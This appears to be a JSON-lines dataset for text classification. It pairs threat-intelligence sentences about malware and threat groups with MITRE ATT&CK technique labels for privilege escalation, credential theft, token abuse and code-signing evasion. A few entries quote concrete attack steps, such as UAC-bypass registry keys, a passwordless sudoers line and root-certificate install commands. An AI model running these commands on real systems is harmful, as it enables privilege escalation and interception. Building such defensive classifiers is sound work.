{"text1":"Avaddon bypasses UAC using the CMSTPLUA COM interface.","labels":"['T1548.002']"}
|
|
{"text1":"BitPaymer can suppress UAC prompts by setting the \"HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command\" registry key on Windows 10 or \"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\" on Windows 7 and launching the \"eventvwr.msc\" process, which launches BitPaymer with elevated privileges.","labels":"['T1548.002']"}
|
|
{"text1":"Bumblebee has the ability to bypass UAC to deploy post exploitation tools with elevated privileges.","labels":"['T1548.002']"}
|
|
{"text1":"CSPY Downloader can bypass UAC using the SilentCleanup task to execute the binary with elevated privileges.","labels":"['T1548.002']"}
|
|
{"text1":"Clambling has the ability to bypass UAC using a `passuac.dll` file.","labels":"['T1548.002']"}
|
|
{"text1":"Cobalt Group has bypassed UAC.","labels":"['T1548.002']"}
|
|
{"text1":"Cobalt Strike can use a number of known techniques to bypass Windows UAC.","labels":"['T1548.002']"}
|
|
{"text1":"During Operation Honeybee, the threat actors used the malicious NTWDBLIB.DLL and `cliconfig.exe` to bypass UAC protections.","labels":"['T1548.002']"}
|
|
{"text1":"Empire includes various modules to attempt to bypass UAC for escalation of privileges.","labels":"['T1548.002']"}
|
|
{"text1":"Grandoreiro can bypass UAC by registering as the default handler for .MSC files.","labels":"['T1548.002']"}
|
|
{"text1":"H1N1 bypasses user access control by using a DLL hijacking vulnerability in the Windows Update Standalone Installer (wusa.exe).","labels":"['T1548.002']"}
|
|
{"text1":"Honeybee uses a combination of NTWDBLIB.dll and cliconfg.exe to bypass UAC protections using DLL hijacking.","labels":"['T1548.002']"}
|
|
{"text1":"InvisiMole can use fileless UAC bypass and create an elevated COM object to escalate privileges.","labels":"['T1548.002']"}
|
|
{"text1":"KOCTOPUS will perform UAC bypass either through fodhelper.exe or eventvwr.exe.","labels":"['T1548.002']"}
|
|
{"text1":"KONNI has bypassed UAC by performing token impersonation as well as an RPC-based method, this included bypassing UAC set to \u201cAlwaysNotify\".","labels":"['T1548.002']"}
|
|
{"text1":"Many ZeroT samples can perform UAC bypass by using eventvwr.exe to execute a malicious file.","labels":"['T1548.002']"}
|
|
{"text1":"MuddyWater uses various techniques to bypass UAC.","labels":"['T1548.002']"}
|
|
{"text1":"Patchwork bypassed User Access Control (UAC).","labels":"['T1548.002']"}
|
|
{"text1":"PipeMon installer can use UAC bypass techniques to install the payload.","labels":"['T1548.002']"}
|
|
{"text1":"PoshC2 can utilize multiple methods to bypass UAC.","labels":"['T1548.002']"}
|
|
{"text1":"Pupy can bypass Windows UAC through either DLL hijacking, eventvwr, or appPaths.","labels":"['T1548.002']"}
|
|
{"text1":"QuasarRAT can generate a UAC pop-up Window to prompt the target user to run a command as the administrator.","labels":"['T1548.002']"}
|
|
{"text1":"RCSession can bypass UAC to escalate privileges.","labels":"['T1548.002']"}
|
|
{"text1":"RTM can attempt to run the program as admin, then show a fake error message and a legitimate UAC bypass prompt to the user in an attempt to socially engineer the user into escalating privileges.","labels":"['T1548.002']"}
|
|
{"text1":"Ramsay can use UACMe for privilege escalation.","labels":"['T1548.002']"}
|
|
{"text1":"Remcos has a command for UAC bypassing.","labels":"['T1548.002']"}
|
|
{"text1":"SILENTTRINITY contains a number of modules that can bypass UAC, including through Window's Device Manager, Manage Optional Features, and an image hijack on the `.msc` file extension.","labels":"['T1548.002']"}
|
|
{"text1":"Saint Bot has attempted to bypass UAC using `fodhelper.exe` to escalate privileges.","labels":"['T1548.002']"}
|
|
{"text1":"Sakula contains UAC bypass code for both 32- and 64-bit systems.","labels":"['T1548.002']"}
|
|
{"text1":"ShimRat has hijacked the cryptbase.dll within migwiz.exe to escalate privileges. This prevented the User Access Control window from appearing.","labels":"['T1548.002']"}
|
|
{"text1":"UACMe contains many methods for bypassing Windows User Account Control on multiple versions of the operating system.","labels":"['T1548.002']"}
|
|
{"text1":"WarzoneRAT can use `sdclt.exe` to bypass UAC in Windows 10 to escalate privileges; for older Windows versions WarzoneRAT can use the IFileOperation exploit to bypass the UAC module.","labels":"['T1548.002']"}
|
|
{"text1":"WastedLocker can perform a UAC bypass if it is not executed with administrator rights or if the infected host runs Windows Vista or later.","labels":"['T1548.002']"}
|
|
{"text1":"Winnti for Windows can use a variant of the sysprep UAC bypass.","labels":"['T1548.002']"}
|
|
{"text1":"Cobalt Strike can use \"sudo\" to run a command.","labels":"['T1548.003']"}
|
|
{"text1":"Dok adds \"admin ALL=(ALL) NOPASSWD: ALL\" to the \"\/etc\/sudoers\" file.","labels":"['T1548.003']"}
|
|
{"text1":"Proton modifies the tty_tickets line in the sudoers file.","labels":"['T1548.003']"}
|
|
{"text1":"OSX\/Shlayer can escalate privileges to root by asking the user for credentials.","labels":"['T1548.004']"}
|
|
{"text1":"FoggyWeb can allow abuse of a compromised AD FS server's SAML token.","labels":"['T1550']"}
|
|
{"text1":"APT28 has used several malicious applications that abused OAuth access tokens to gain access to target email accounts, including Gmail and Yahoo Mail.","labels":"['T1550.001']"}
|
|
{"text1":"APT29 has used compromised service principals to make changes to the Office 365 environment.","labels":"['T1550.001']"}
|
|
{"text1":"CreepyDrive can use legitimate OAuth refresh tokens to authenticate with OneDrive.","labels":"['T1550.001']"}
|
|
{"text1":"Peirates can use stolen service account tokens to perform its operations. It also enables adversaries to switch between valid service accounts.","labels":"['T1550.001']"}
|
|
{"text1":"APT28 has used pass the hash for lateral movement.","labels":"['T1550.002']"}
|
|
{"text1":"APT32 has used pass the hash for lateral movement.","labels":"['T1550.002']"}
|
|
{"text1":"Chimera has dumped password hashes for use in pass the hash authentication attacks.","labels":"['T1550.002']"}
|
|
{"text1":"Cobalt Strike can perform pass the hash.","labels":"['T1550.002']"}
|
|
{"text1":"CrackMapExec can pass the hash to authenticate via SMB.","labels":"['T1550.002']"}
|
|
{"text1":"During Night Dragon, threat actors used pass-the-hash tools to obtain authenticated access to sensitive internal desktops and servers.","labels":"['T1550.002']"}
|
|
{"text1":"HOPLIGHT has been observed loading several APIs associated with Pass the Hash.","labels":"['T1550.002']"}
|
|
{"text1":"Kimsuky has used pass the hash for authentication to remote access software used in C2.","labels":"['T1550.002']"}
|
|
{"text1":"Night Dragon used pass-the-hash tools to gain usernames and passwords.","labels":"['T1550.002']"}
|
|
{"text1":"Pass-The-Hash Toolkit can perform pass the hash.","labels":"['T1550.002']"}
|
|
{"text1":"PoshC2 has a number of modules that leverage pass the hash for lateral movement.","labels":"['T1550.002']"}
|
|
{"text1":"The APT1 group is known to have used pass the hash.","labels":"['T1550.002']"}
|
|
{"text1":"APT29 used Kerberos ticket attacks for lateral movement.","labels":"['T1550.003']"}
|
|
{"text1":"BRONZE BUTLER has created forged Kerberos Ticket Granting Ticket (TGT) and Ticket Granting Service (TGS) tickets to maintain administrative access.","labels":"['T1550.003']"}
|
|
{"text1":"Mimikatz\u2019s \"LSADUMP::DCSync\" and \"KERBEROS::PTT\" modules implement the three steps required to extract the krbtgt account hash and create\/use Kerberos tickets.","labels":"['T1550.003']"}
|
|
{"text1":"Pupy can also perform pass-the-ticket.","labels":"['T1550.003']"}
|
|
{"text1":"Some SeaDuke samples have a module to use pass the ticket with Kerberos for authentication.","labels":"['T1550.003']"}
|
|
{"text1":"APT29 used stolen cookies to access cloud resources, and a forged \"duo-sid\" cookie to bypass MFA set on an email account.","labels":"['T1550.004']"}
|
|
{"text1":"UNC2452 used a forged \"duo-sid\" cookie to bypass MFA set on an email account.","labels":"['T1550.004']"}
|
|
{"text1":"Astaroth uses an external software known as NetPass to recover passwords.","labels":"['T1552', 'T1555']"}
|
|
{"text1":"AADInternals can gather unsecured credentials for Azure AD services, such as Azure AD Connect, from a local machine.","labels":"['T1552.001']"}
|
|
{"text1":"Agent Tesla has the ability to extract credentials from configuration or support files.","labels":"['T1552.001']"}
|
|
{"text1":"Azorult can steal credentials in files belonging to common software such as Skype, Telegram, and Steam.","labels":"['T1552.001']"}
|
|
{"text1":"Fox Kitten has accessed files to gain valid credentials.","labels":"['T1552.001']"}
|
|
{"text1":"Hildegard has searched for SSH keys, Docker credentials, and Kubernetes service tokens.","labels":"['T1552.001']"}
|
|
{"text1":"LaZagne can obtain credentials from chats, databases, mail, and WiFi.","labels":"['T1552.001']"}
|
|
{"text1":"QuasarRAT can obtain passwords from FTP clients.","labels":"['T1552.001']"}
|
|
{"text1":"Smoke Loader searches for files named logins.json to parse for credentials.","labels":"['T1552.001']"}
|
|
{"text1":"Stolen Pencil has used tools that are capable of obtaining credentials from saved mail.","labels":"['T1552.001']"}
|
|
{"text1":"TeamTNT has searched for unsecured AWS credentials and Docker API credentials.","labels":"['T1552.001']"}
|
|
{"text1":"TrickBot can obtain passwords stored in files from several applications such as Outlook, Filezilla, OpenSSH, OpenVPN and WinSCP. Additionally, it searches for the \".vnc.lnk\" affix to steal VNC credentials.","labels":"['T1552.001']"}
|
|
{"text1":"XTunnel is capable of accessing locally stored passwords on victims.","labels":"['T1552.001']"}
|
|
{"text1":"jRAT can capture passwords from common chat applications such as MSN Messenger, AOL, Instant Messenger, and and Google Talk.","labels":"['T1552.001']"}
|
|
{"text1":"APT32 used Outlook Credential Dumper to harvest credentials stored in Windows registry.","labels":"['T1552.002']"}
|
|
{"text1":"IceApple can harvest credentials from local and remote host registries.","labels":"['T1552.002']"}
|
|
{"text1":"PowerSploit has several modules that search the Windows Registry for stored credentials: \"Get-UnattendedInstallFile\", \"Get-Webconfig\", \"Get-ApplicationHost\", \"Get-SiteListPassword\", \"Get-CachedGPPPassword\", and \"Get-RegistryAutoLogon\".","labels":"['T1552.002']"}
|
|
{"text1":"Reg may be used to find credentials in the Windows Registry.","labels":"['T1552.002']"}
|
|
{"text1":"TrickBot has retrieved PuTTY credentials by querying the \"Software\\SimonTatham\\Putty\\Sessions\" registry key","labels":"['T1552.002']"}
|
|
{"text1":"Valak can use the clientgrabber module to steal e-mail credentials from the Registry.","labels":"['T1552.002']"}
|
|
{"text1":"Kinsing has searched \"bash_history\" for credentials.","labels":"['T1552.003']"}
|
|
{"text1":"APT29 obtained PKI keys, certificate files and the private encryption key from an Active Directory Federation Services (AD FS) container to decrypt corresponding SAML signing certificates.","labels":"['T1552.004']"}
|
|
{"text1":"During Operation Wocao, threat actors used Mimikatz to dump certificates and private keys from the Windows certificate store.","labels":"['T1552.004']"}
|
|
{"text1":"Ebury has intercepted unencrypted private keys as well as private key pass-phrases.","labels":"['T1552.004']"}
|
|
{"text1":"Empire can use modules like \"Invoke-SessionGopher\" to extract private key and session information.","labels":"['T1552.004']"}
|
|
{"text1":"Hildegard has searched for private keys in .ssh.","labels":"['T1552.004']"}
|
|
{"text1":"Kinsing has searched for private keys.","labels":"['T1552.004']"}
|
|
{"text1":"Machete has scanned and looked for cryptographic keys and certificate file extensions.","labels":"['T1552.004']"}
|
|
{"text1":"Mimikatz's \"CRYPTO::Extract\" module can extract keys by interacting with Windows cryptographic application programming interface (API) functions.","labels":"['T1552.004']"}
|
|
{"text1":"Rocke has used SSH private keys on the infected machine to spread its coinminer throughout a network.","labels":"['T1552.004']"}
|
|
{"text1":"TeamTNT has searched for unsecured SSH keys.","labels":"['T1552.004']"}
|
|
{"text1":"Hildegard has queried the Cloud Instance Metadata API for cloud credentials.","labels":"['T1552.005']"}
|
|
{"text1":"Peirates can query the query AWS and GCP metadata APIs for secrets.","labels":"['T1552.005']"}
|
|
{"text1":"TeamTNT has queried the AWS instance metadata service for credentials.","labels":"['T1552.005']"}
|
|
{"text1":"APT33 has used a variety of publicly available tools like Gpppassword to gather credentials.","labels":"['T1552.006']"}
|
|
{"text1":"PowerSploit contains a collection of Exfiltration modules that can harvest credentials from Group Policy Preferences.","labels":"['T1552.006']"}
|
|
{"text1":"Peirates can query the Kubernetes API for secrets.","labels":"['T1552.007']"}
|
|
{"text1":"Axiom has used digital certificates to deliver malware.","labels":"['T1553']"}
|
|
{"text1":"OSX_OCEANLOTUS.D uses the command \"xattr -d com.apple.quarantine\" to remove the quarantine file attribute used by Gatekeeper.","labels":"['T1553.001']"}
|
|
{"text1":"XCSSET has dropped a malicious applet into an app's `...\/Contents\/MacOS\/` folder of a previously launched app to bypass Gatekeeper's security checks on first launch apps (prior to macOS 13).","labels":"['T1553.001']"}
|
|
{"text1":"A QuasarRAT .dll file is digitally signed by a certificate from AirVPN.","labels":"['T1553.002']"}
|
|
{"text1":"APT29 was able to get SUNBURST signed by SolarWinds code signing certificates by injecting the malware into the SolarWinds Orion software lifecycle.","labels":"['T1553.002']"}
|
|
{"text1":"APT41 leveraged code-signing certificates to sign malware when targeting both gaming and non-gaming organizations.","labels":"['T1553.002']"}
|
|
{"text1":"Anchor has been signed with valid certificates to evade detection by security tools.","labels":"['T1553.002']"}
|
|
{"text1":"BLINDINGCAN has been signed with code-signing certificates such as CodeRipper.","labels":"['T1553.002']"}
|
|
{"text1":"Bandook was signed with valid Certum certificates.","labels":"['T1553.002']"}
|
|
{"text1":"Bazar has been signed with fake certificates including those appearing to be from VB CORPORATE PTY. LTD.","labels":"['T1553.002']"}
|
|
{"text1":"CSPY Downloader has come signed with revoked certificates.","labels":"['T1553.002']"}
|
|
{"text1":"ChChes samples were digitally signed with a certificate originally used by Hacking Team that was later leaked and subsequently revoked.","labels":"['T1553.002']"}
|
|
{"text1":"Clop can use code signing to evade detection.","labels":"['T1553.002']"}
|
|
{"text1":"Cobalt Strike can use self signed Java applets to execute signed applet attacks.","labels":"['T1553.002']"}
|
|
{"text1":"CopyKittens digitally signed an executable with a stolen certificate from legitimate company AI Squared.","labels":"['T1553.002']"}
|
|
{"text1":"Darkhotel has used code-signing certificates on its malware that are either forged due to weak keys or stolen. Darkhotel has also stolen certificates and signed backdoors and downloaders with them.","labels":"['T1553.002']"}
|
|
{"text1":"During Operation Honeybee, the threat actors deployed the MaoCheng dropper with a stolen Adobe Systems digital signature.","labels":"['T1553.002']"}
|
|
{"text1":"Ebury has installed a self-signed RPM package mimicking the original system package on RPM based systems.","labels":"['T1553.002']"}
|
|
{"text1":"Ecipekac has used a valid, legitimate digital signature to evade detection.","labels":"['T1553.002']"}
|
|
{"text1":"Ember Bear has used stolen certificates from Electrum Technologies GmbH to sign payloads.","labels":"['T1553.002']"}
|
|
{"text1":"FIN6 has used Comodo code-signing certificates.","labels":"['T1553.002']"}
|
|
{"text1":"FIN7 has signed Carbanak payloads with legally purchased code signing certificates. FIN7 has also digitally signed their phishing documents, backdoors and other staging tools to bypass security controls.","labels":"['T1553.002']"}
|
|
{"text1":"Gazer versions are signed with various valid certificates; one was likely faked and issued by Comodo for \"Solid Loop Ltd,\" and another was issued for \"Ultimate Computer Support Ltd.\"","labels":"['T1553.002']"}
|
|
{"text1":"HermeticWizard has been signed by valid certificates assigned to Hermetica Digital.","labels":"['T1553.002']"}
|
|
{"text1":"Honeybee uses a dropper called MaoCheng that harvests a stolen digital signature from Adobe Systems.","labels":"['T1553.002']"}
|
|
{"text1":"Kimsuky has signed files with the name EGIS CO,. Ltd..","labels":"['T1553.002']"}
|
|
{"text1":"Lazarus Group has digitally signed malware and utilities to evade detection.","labels":"['T1553.002']"}
|
|
{"text1":"Leviathan has used stolen code signing certificates to sign malware.","labels":"['T1553.002']"}
|
|
{"text1":"Molerats has used forged Microsoft code-signing certificates on malware.","labels":"['T1553.002']"}
|
|
{"text1":"More_eggs has used a signed binary shellcode loader and a signed Dynamic Link Library (DLL) to create a reverse shell.","labels":"['T1553.002']"}
|
|
{"text1":"Nerex drops a signed Microsoft DLL to disk.","labels":"['T1553.002']"}
|
|
{"text1":"PROMETHIUM has signed code with self-signed certificates.","labels":"['T1553.002']"}
|
|
{"text1":"Patchwork has signed malware with self-signed certificates from fictitious and spoofed legitimate software companies.","labels":"['T1553.002']"}
|
|
{"text1":"QakBot can use signed loaders to evade detection.","labels":"['T1553.002']"}
|
|
{"text1":"RTM samples have been signed with a code-signing certificates.","labels":"['T1553.002']"}
|
|
{"text1":"SDelete is digitally signed by Microsoft.","labels":"['T1553.002']"}
|
|
{"text1":"SUNBURST was digitally signed by SolarWinds from March - May 2020.","labels":"['T1553.002']"}
|
|
{"text1":"Silence has used a valid certificate to sign their primary loader Silence.Downloader (aka TrueBot).","labels":"['T1553.002']"}
|
|
{"text1":"Some Daserf samples were signed with a stolen digital certificate.","labels":"['T1553.002']"}
|
|
{"text1":"SpicyOmelette has been signed with valid digital certificates.","labels":"['T1553.002']"}
|
|
{"text1":"StrongPity has been signed with self-signed certificates.","labels":"['T1553.002']"}
|
|
{"text1":"TrickBot has come with a signed downloader component.","labels":"['T1553.002']"}
|
|
{"text1":"Turla has used valid digital certificates from Sysprint AG to sign its Epic dropper.","labels":"['T1553.002']"}
|
|
{"text1":"UNC2452 was able to get SUNBURST signed by SolarWinds code signing certificates by injecting the malware into the SolarWinds Orion software lifecycle.","labels":"['T1553.002']"}
|
|
{"text1":"Winnti Group used stolen certificates to sign its malware.","labels":"['T1553.002']"}
|
|
{"text1":"Wizard Spider has used Digicert code-signing certificates for some of its malware.","labels":"['T1553.002']"}
|
|
{"text1":"Dok installs a root certificate to aid in Adversary-in-the-Middle actions using the command \"add-trusted-cert -d -r trustRoot -k \/Library\/Keychains\/System.keychain \/tmp\/filename\".","labels":"['T1553.004']"}
|
|
{"text1":"RTM can add a certificate to the Windows store.","labels":"['T1553.004']"}
|
|
{"text1":"certutil can be used to install browser root certificates as a precursor to performing Adversary-in-the-Middle between connections to banking websites. Example command: \"certutil -addstore -f -user ROOT ProgramData\\cert512121.der\".","labels":"['T1553.004']"}
|
|
{"text1":"APT29 has embedded ISO images and VHDX files in HTML to evade Mark-of-the-Web.","labels":"['T1553.005']"}
|
|
{"text1":"Amadey has modified the `:Zone.Identifier` in the ADS area to zero.","labels":"['T1553.005']"}
|
|
{"text1":"TA505 has used .iso files to deploy malicious .lnk files.","labels":"['T1553.005']"}
|
|
{"text1":"APT39 has used malware to turn off the \"RequireSigned\" feature which ensures only signed DLLs can be run on Windows.","labels":"['T1553.006']"}
|
|
{"text1":"BlackEnergy has enabled the \"TESTSIGNING\" boot configuration option to facilitate loading of a driver component.","labels":"['T1553.006']"}
|
|
{"text1":"Hikit has attempted to disable driver signing verification by tampering with several Registry keys prior to the loading of a rootkit driver component.","labels":"['T1553.006']"}
|
|
{"text1":"Bonadan has maliciously altered the OpenSSH binary on targeted systems to create a backdoor.","labels":"['T1554']"}
|
|
{"text1":"Industroyer has used a Trojanized version of the Windows Notepad application for an additional backdoor persistence mechanism.","labels":"['T1554']"}
|
|
{"text1":"Kobalos replaced the SSH client with a trojanized SSH client to steal credentials on compromised systems.","labels":"['T1554']"}
|
|
{"text1":"ThiefQuest searches through the \"\/Users\/\" folder looking for executable files. For each executable, ThiefQuest prepends a copy of itself to the beginning of the file. When the file is executed, the ThiefQuest code is executed first. ThiefQuest creates a hidden file, copies the original target executable to the file, then executes the new hidden file to maintain the appearance of normal behavior.","labels":"['T1554']"}
|
|
{"text1":"XCSSET uses a malicious browser application to replace the legitimate browser in order to continuously capture credentials, monitor web traffic, and download additional modules.","labels":"['T1554']"}
|
|
{"text1":"A module in Prikormka collects passwords stored in applications installed on the victim.","labels":"['T1555']"}
|
|
{"text1":"APT39 has used the Smartftp Password Decryptor tool to decrypt FTP passwords.","labels":"['T1555']"}
|
|
{"text1":"Agent Tesla has the ability to steal credentials from FTP clients and wireless profiles.","labels":"['T1555']"}
|
|
{"text1":"CosmicDuke collects user credentials, including passwords, for various programs including popular instant messaging applications and email clients as well as WLAN keys.","labels":"['T1555']"}
|
|
{"text1":"FIN6 has used the Stealer One credential stealer to target e-mail and file transfer utilities including FTP.","labels":"['T1555']"}
|
|
{"text1":"KGH_SPY can collect credentials from WINSCP.","labels":"['T1555']"}
|
|
{"text1":"Matryoshka is capable of stealing Outlook passwords.","labels":"['T1555']"}
|
|
{"text1":"Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the credential vault and DPAPI.","labels":"['T1555']"}
|
|
{"text1":"NETWIRE can retrieve passwords from messaging and mail client applications.","labels":"['T1555']"}
|
|
{"text1":"OLDBAIT collects credentials from several email clients.","labels":"['T1555']"}
|
|
{"text1":"PLEAD has the ability to steal saved passwords from Microsoft Outlook.","labels":"['T1555']"}
|
|
{"text1":"PoshC2 can decrypt passwords stored in the RDCMan configuration file.","labels":"['T1555']"}
|
|
{"text1":"Stealth Falcon malware gathers passwords from multiple sources, including Windows Credential Vault and Outlook.","labels":"['T1555']"}
|
|
{"text1":"UNC2452 used account credentials they obtained to attempt access to Group Managed Service Account (gMSA) passwords.","labels":"['T1555']"}
|
|
{"text1":"Calisto collects Keychain storage data and copies those passwords\/tokens to a file.","labels":"['T1555.001']"}
|
|
{"text1":"LaZagne can obtain credentials from macOS Keychains.","labels":"['T1555.001']"}
|
|
{"text1":"MacMa can dump credentials from the macOS keychain.","labels":"['T1555.001']"}
|
|
{"text1":"Proton gathers credentials in files for keychains.","labels":"['T1555.001']"}
|
|
{"text1":"Keydnap uses the keychaindump project to read securityd memory.","labels":"['T1555.002']"}
|
|
{"text1":"A module in Prikormka gathers logins and passwords stored in applications on the victims, including Google Chrome, Mozilla Firefox, and several other browsers.","labels":"['T1555.003']"}
|
|
{"text1":"APT29 has stolen user's saved passwords from Chrome.","labels":"['T1555.003']"}
|
|
{"text1":"APT37 has used a credential stealer known as ZUMKONG that can harvest usernames and passwords stored in browsers.","labels":"['T1555.003']"}
|
|
{"text1":"Agent Tesla can gather credentials from a number of browsers.","labels":"['T1555.003']"}
|
|
{"text1":"Ajax Security Team has used FireMalv custom-developed malware, which collected passwords from the Firefox browser storage.","labels":"['T1555.003']"}
|
|
{"text1":"Azorult can steal credentials from the victim's browser.","labels":"['T1555.003']"}
|
|
{"text1":"BLUELIGHT can collect passwords stored in web browers, including Internet Explorer, Edge, Chrome, and Naver Whale.","labels":"['T1555.003']"}
|
|
{"text1":"BlackEnergy has used a plug-in to gather credentials from web browsers including FireFox, Google Chrome, and Internet Explorer.","labels":"['T1555.003']"}
|
|
{"text1":"Carberp's passw.plug plugin can gather passwords saved in Opera, Internet Explorer, Safari, Firefox, and Chrome.","labels":"['T1555.003']"}
|
|
{"text1":"ChChes steals credentials stored inside Internet Explorer.","labels":"['T1555.003']"}
|
|
{"text1":"Chaes can steal login credentials and stored financial information from the browser.","labels":"['T1555.003']"}
|
|
{"text1":"CookieMiner can steal saved usernames and passwords in Chrome as well as credit card credentials.","labels":"['T1555.003']"}
|
|
{"text1":"Crimson contains a module to steal credentials from Web browsers on the victim machine.","labels":"['T1555.003']"}
|
|
{"text1":"Empire can use modules that extract passwords from common web browsers such as Firefox and Chrome.","labels":"['T1555.003']"}
|
|
{"text1":"FIN6 has used the Stealer One credential stealer to target web browsers.","labels":"['T1555.003']"}
|
|
{"text1":"Inception used a browser plugin to steal passwords and sessions from Internet Explorer, Chrome, Opera, Firefox, Torch, and Yandex.","labels":"['T1555.003']"}
|
|
{"text1":"Javali can capture login credentials from open browsers including Firefox, Chrome, Internet Explorer, and Edge.","labels":"['T1555.003']"}
|
|
{"text1":"KGH_SPY has the ability to steal data from the Chrome, Edge, Firefox, Thunderbird, and Opera browsers.","labels":"['T1555.003']"}
|
|
{"text1":"KeyBoy attempts to collect passwords from browsers.","labels":"['T1555.003']"}
|
|
{"text1":"Kimsuky has used browser extensions including Google Chrome to steal passwords and cookies from browsers. Kimsuky has also used Nirsoft's WebBrowserPassView tool to dump the passwords obtained from victims.","labels":"['T1555.003']"}
|
|
{"text1":"LAPSUS$ has obtained passwords and session tokens with the use of the Redline password stealer.","labels":"['T1555.003']"}
|
|
{"text1":"LaZagne can obtain credentials from web browsers such as Google Chrome, Internet Explorer, and Firefox.","labels":"['T1555.003']"}
|
|
{"text1":"Lizar has a module to collect usernames and passwords stored in browsers.","labels":"['T1555.003']"}
|
|
{"text1":"Lokibot has demonstrated the ability to steal credentials from multiple applications and data sources including Safari and the Chromium and Mozilla Firefox-based web browsers.","labels":"['T1555.003']"}
|
|
{"text1":"Machete collects stored credentials from several web browsers.","labels":"['T1555.003']"}
|
|
{"text1":"Magic Hound used FireMalv, custom-developed malware, which collected passwords from the Firefox browser storage.","labels":"['T1555.003']"}
|
|
{"text1":"Melcoz has the ability to steal credentials from web browsers.","labels":"['T1555.003']"}
|
|
{"text1":"Molerats used the public tool BrowserPasswordDump10 to dump passwords saved in browsers on victims.","labels":"['T1555.003']"}
|
|
{"text1":"NETWIRE has the ability to steal credentials from web browsers including Internet Explorer, Opera, Yandex, and Chrome.","labels":"['T1555.003']"}
|
|
{"text1":"OLDBAIT collects credentials from Internet Explorer, Mozilla Firefox, and Eudora.","labels":"['T1555.003']"}
|
|
{"text1":"PLEAD can harvest saved credentials from browsers such as Google Chrome, Microsoft Internet Explorer, and Mozilla Firefox.","labels":"['T1555.003']"}
|
|
{"text1":"Patchwork dumped the login data database from \"\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data\".","labels":"['T1555.003']"}
|
|
{"text1":"PinchDuke steals credentials from compromised hosts. PinchDuke's credential stealing functionality is believed to be based on the source code of the Pinch credential stealing malware (also known as LdPinch). Credentials targeted by PinchDuke include ones associated with many sources such as Netscape Navigator, Mozilla Firefox, Mozilla Thunderbird, and Internet Explorer.","labels":"['T1555.003']"}
|
|
{"text1":"Proton gathers credentials for Google Chrome.","labels":"['T1555.003']"}
|
|
{"text1":"QakBot has collected usernames and passwords from Firefox and Chrome.","labels":"['T1555.003']"}
|
|
{"text1":"QuasarRAT can obtain passwords from common web browsers.","labels":"['T1555.003']"}
|
|
{"text1":"ROKRAT can steal credentials stored in Web browsers by querying the sqlite database.","labels":"['T1555.003']"}
|
|
{"text1":"RainyDay can use tools to collect credentials from web browsers.","labels":"['T1555.003']"}
|
|
{"text1":"RedLeaves can gather browser usernames and passwords.","labels":"['T1555.003']"}
|
|
{"text1":"Sandworm Team's CredRaptor tool can collect saved passwords from various internet browsers.","labels":"['T1555.003']"}
|
|
{"text1":"Smoke Loader searches for credentials stored from web browsers.","labels":"['T1555.003']"}
|
|
{"text1":"Some Backdoor.Oldrea samples contain a publicly available Web browser password recovery tool.","labels":"['T1555.003']"}
|
|
{"text1":"Stealth Falcon malware gathers passwords from multiple sources, including Internet Explorer, Firefox, and Chrome.","labels":"['T1555.003']"}
|
|
{"text1":"TSCookie has the ability to steal saved passwords from the Internet Explorer, Edge, Firefox, and Chrome browsers.","labels":"['T1555.003']"}
|
|
{"text1":"TrickBot can obtain passwords stored in files from web browsers such as Chrome, Firefox, Internet Explorer, and Microsoft Edge, sometimes using esentutl.","labels":"['T1555.003']"}
|
|
{"text1":"Trojan.Karagany can steal data and credentials from browsers.","labels":"['T1555.003']"}
|
|
{"text1":"WarzoneRAT has the capability to grab passwords from numerous web browsers as well as from Outlook and Thunderbird email clients.","labels":"['T1555.003']"}
|
|
{"text1":"XAgentOSX contains the getFirefoxPassword function to attempt to locate Firefox passwords.","labels":"['T1555.003']"}
|
|
{"text1":"jRAT can capture passwords from common web browsers such as Internet Explorer, Google Chrome, and Firefox.","labels":"['T1555.003']"}
|
|
{"text1":"njRAT has a module that steals passwords saved in victim web browsers.","labels":"['T1555.003']"}
|
|
{"text1":"OilRig has used credential dumping tool named VALUEVAULT to steal credentials from the Windows Credential Manager.","labels":"['T1555.004']"}
|
|
{"text1":"ROKRAT can steal credentials by leveraging the Windows Vault mechanism.","labels":"['T1555.004']"}
|
|
{"text1":"RainyDay can use the QuarksPwDump tool to obtain local passwords and domain cached credentials.","labels":"['T1555.004']"}
|
|
{"text1":"Turla has gathered credentials from the Windows Credential Manager tool.","labels":"['T1555.004']"}
|
|
{"text1":"Valak can use a .NET compiled module named exchgrabber to enumerate credentials from the Credential Manager.","labels":"['T1555.004']"}
|
|
{"text1":"During Operation Wocao, threat actors accessed and collected credentials from password managers.","labels":"['T1555.005']"}
|
|
{"text1":"MarkiRAT can gather information from the Keepass password manager.","labels":"['T1555.005']"}
|
|
{"text1":"Operation Wocao has accessed and collected credentials from password managers.","labels":"['T1555.005']"}
|
|
{"text1":"Proton gathers credentials in files for 1password.","labels":"['T1555.005']"}
|
|
{"text1":"Threat Group-3390 obtained a KeePass database from a compromised host.","labels":"['T1555.005']"}
|
|
{"text1":"TrickBot can steal passwords from the KeePass open source password manager.","labels":"['T1555.005']"}
|
|
{"text1":"Kessel has trojanized the \"ssh_login\" and \"user-auth_pubkey\" functions to steal plaintext credentials.","labels":"['T1556']"}
|
|
{"text1":"SILENTTRINITY can create a backdoor in KeePass using a malicious config file and in TortoiseSVN using a registry hook.","labels":"['T1556']"}
|
|
{"text1":"Chimera's malware has altered the NTLM authentication program on domain controllers to allow Chimera to login without a valid credential.","labels":"['T1556.001']"}
|
|
{"text1":"Remsec harvests plain-text credentials as a password filter registered on domain controllers.","labels":"['T1556.002']"}
|
|
{"text1":"Strider has registered its persistence module on domain controllers as a Windows LSA (Local System Authority) password filter to acquire credentials any time a domain, local user, or administrator logs in or changes a password.","labels":"['T1556.002']"}
|
|
{"text1":"Ebury can deactivate PAM modules to tamper with the sshd configuration.","labels":"['T1556.003']"}
|
|
{"text1":"Skidmap has the ability to replace the pam_unix.so file on an infected machine with its own malicious version that accepts a specific backdoor password for all users.","labels":"['T1556.003']"}
|
|
{"text1":"SYNful Knock has the capability to add its own custom backdoor password when it modifies the operating system of the affected network device.","labels":"['T1556.004']"}
|
|
{"text1":"APT29 has edited the `Microsoft.IdentityServer.Servicehost.exe.config` file to load a malicious DLL into the AD FS process, thereby enabling persistent access to any service federated with AD FS for a user with a specified User Principal Name.","labels":"['T1556.007']"}
|
|
{"text1":"Dok proxies web traffic to potentially monitor and alter victim HTTP(S) traffic.","labels":"['T1557']"}
|
|
